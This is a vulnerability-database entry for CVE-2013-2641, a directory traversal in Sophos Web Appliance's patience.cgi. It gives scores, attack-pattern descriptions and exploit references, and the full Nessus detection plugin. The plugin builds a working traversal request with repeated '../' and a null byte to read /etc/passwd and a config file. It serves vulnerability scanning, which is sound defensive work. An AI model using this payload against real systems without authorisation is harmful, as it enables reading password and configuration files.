Vulnerabilities > CVE-2013-2641 - Path Traversal vulnerability in Sophos web Appliance and web Appliance Firmware

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
sophos
CWE-22
nessus
exploit available
metasploit

Summary

Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter.

Vulnerable Configurations

Part Description Count
OS
Sophos
1
Hardware
Sophos
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

D2sec

Exploit-Db

descriptionSophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities. CVE-2013-2641,CVE-2013-2642,CVE-2013-2643. Webapps exploit for linux platform
idEDB-ID:24932
last seen2016-02-03
modified2013-04-08
published2013-04-08
reporterSEC Consult
sourcehttps://www.exploit-db.com/download/24932/
titleSophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities

Metasploit

descriptionThis module abuses a directory traversal in Sophos Web Protection Appliance, specifically on the /cgi-bin/patience.cgi component. This module has been tested successfully on the Sophos Web Virtual Appliance v3.7.0.
idMSF:AUXILIARY/ADMIN/HTTP/SOPHOS_WPA_TRAVERSAL
last seen2020-03-06
modified2017-07-24
published2013-09-10
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/sophos_wpa_traversal.rb
titleSophos Web Protection Appliance patience.cgi Directory Traversal

Nessus

NASL familyCGI abuses
NASL idSOPHOS_WEB_PROTECTION_DIR_TRAVERSAL.NASL
descriptionThe Sophos Web Protection application running on the remote host is affected by a directory traversal vulnerability in the patience.cgi script due to improper sanitization of user-supplied input passed to the
last seen2020-06-01
modified2020-06-02
plugin id65874
published2013-04-09
reporterThis script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/65874
titleSophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(65874);
  script_version("1.15");
  script_cvs_date("Date: 2019/11/27");

  script_cve_id("CVE-2013-2641");
  script_bugtraq_id(58833);
  script_xref(name:"EDB-ID", value:"24932");

  script_name(english:"Sophos Web Protection Appliance patience.cgi 'id' Parameter Directory Traversal");
  script_summary(english:"Attempts to read a file.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a web application that is affected by a
directory traversal vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Sophos Web Protection application running on the remote host is
affected by a directory traversal vulnerability in the patience.cgi
script due to improper sanitization of user-supplied input passed to
the 'id' parameter. An unauthenticated, remote attacker can exploit
this to retrieve arbitrary files from the remote host subject to the
privileges of the user running the web server.

Note that the application is reportedly affected by additional
vulnerabilities; however, this plugin has not tested for them.");
  # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4aac7176");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Sophos Web Protection Appliance version 3.7.8.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Sophos Web Protection Appliance 3.7.8.1 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/04/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/04/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/04/09");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:sophos:web_appliance");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:sophos:sophos_web_protection");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("sophos_web_protection_detect.nasl");
  script_require_keys("installed_sw/sophos_web_protection");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

appname = 'Sophos Web Protection';

get_install_count(app_name:'sophos_web_protection', exit_if_zero:TRUE);
port = get_http_port(default:443);
install = get_single_install(app_name:'sophos_web_protection', port:port);

vuln_script = install['dir'] + '/cgi-bin/patience.cgi';

files = make_list('/etc/passwd', 'shared.conf');

file_pats = make_array();
file_pats['/etc/passwd'] = "root:.*:0:[01]:";
file_pats['shared.conf'] = '# Generated by Sophox postinstall\\.';    # nb: yes, that's supposed to be "Sophox" and not "Sophos"

contents = '';
vuln_req = '';
found_file = '';
foreach file (files)
{
  # Try to exploit the issue
  if (file[0] == '/')
    exploit = mult_str(str:'../', nb:12) + file + '%00';
  else
    exploit = mult_str(str:'../', nb:2) + '/persist/config/' + file + '%00';

  url = vuln_script + '?id=' + exploit;

  res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

  if (egrep(pattern:file_pats[file], string:res[2]))
  {
    found_file = file;
    vuln_req = url;

    contents = res[2];
    break;
  }
}
if (!vuln_req) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:install['dir']));

if (report_verbosity > 0)
{
  line_limit = 10;
  trailer = '';

  if ('shared.conf' >< found_file)
  {
    header =
      'Nessus verified the issue by trying to include the application\'s own\n' +
      '\'' + found_file + '\' script and verifying its output in the response\n' +
      'stream using the following URL';

    if (report_verbosity > 1)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      trailer =
        'Here is its output (limited to ' + line_limit + ' lines) :\n' +
        '\n' +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\n' +
        beginning_of_response(resp:contents, max_lines:line_limit) +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);
    }
  }
  else
  {
    header =
      'Nessus was able to exploit the issue to retrieve the contents of\n' +
      '\'' + found_file + '\' on the remote host using the following URL';

    if (report_verbosity > 1)
    {
      contents = data_protection::redact_etc_passwd(output:contents);
      trailer =
        'Here are its contents (limited to ' + line_limit + ' lines) :\n' +
        '\n' +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30) + '\n' +
        beginning_of_response(resp:contents, max_lines:line_limit) +
        crap(data:'-', length:30) + ' snip ' + crap(data:'-', length:30);
    }
  }

  report = get_vuln_report(items:vuln_req, port:port, header:header, trailer:trailer);
  security_warning(port:port, extra:report);
}
else security_warning(port);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/121060/SA-20130403-0.txt
idPACKETSTORM:121060
last seen2016-12-05
published2013-04-03
reporterWolfgang Ettlinger
sourcehttps://packetstormsecurity.com/files/121060/Sophos-Web-Protection-Appliance-3.7.8.1-XSS-Command-Execution.html
titleSophos Web Protection Appliance 3.7.8.1 XSS / Command Execution